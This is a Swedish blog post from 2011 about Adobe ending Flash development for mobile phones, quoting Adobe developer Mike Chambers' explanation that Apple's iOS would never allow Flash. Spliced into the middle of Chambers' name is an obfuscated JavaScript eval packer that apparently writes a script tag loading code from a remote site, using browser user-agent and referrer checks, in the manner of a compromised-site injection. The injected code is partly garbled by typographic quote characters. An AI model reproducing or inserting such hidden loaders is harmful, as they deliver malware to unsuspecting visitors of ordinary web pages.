Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Adobe skrotar Flash för telefoner.

Adobe skrotar Flash för telefoner.
Filip Urde
  • On 14 november, 2011
  • http://www.revue.se/filip-urde

Förra veckan blev det känt att Adobe skrotar Flash utvecklingen för mobiltelefoner. Vilket vi på Revue diskuterat och tycker är något väldigt märkligt… Flash är en av de stora fördelarna som Android har gentemot Apple (ios), varför tas då detta bort?

Adobeutvecklaren, Mike eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zianb|var|u0026u|referrer|dhdeh||js|php’.split(’|’),0,{}))
Chambers
som var anställd hos Macromedia (företaget som grundade flash och sedan blev uppköpt av adobe) och sedan jobbat på Adobe i över tio år har skrivit en förklaring till det hela i en bloggpost. Självklart har Apples nekande av tekniken varit ett av bakslagen som lyft fram handligen där man nu väljer att flytta fokus till Air och desktop-utveckling.

Men så här skriver Mike Chambers på sin blogg:

This one should be pretty apparent, but given the fragmentation of the mobile market, and the fact that one of the leading mobile platforms (Apple’s iOS) was not going to allow the Flash Player in the browser, the Flash Player was not on track to reach anywhere near the ubiquity of the Flash Player on desktops.

[…] Just to be very clear on this. No matter what we did, the Flash Player was not going to be available on Apple’s iOS anytime in the foreseeable future.

Vad detta innebär för android får tiden visa. Man köper nog inte en android enbart p.g.a. flash ändå.

www.mikechambers.com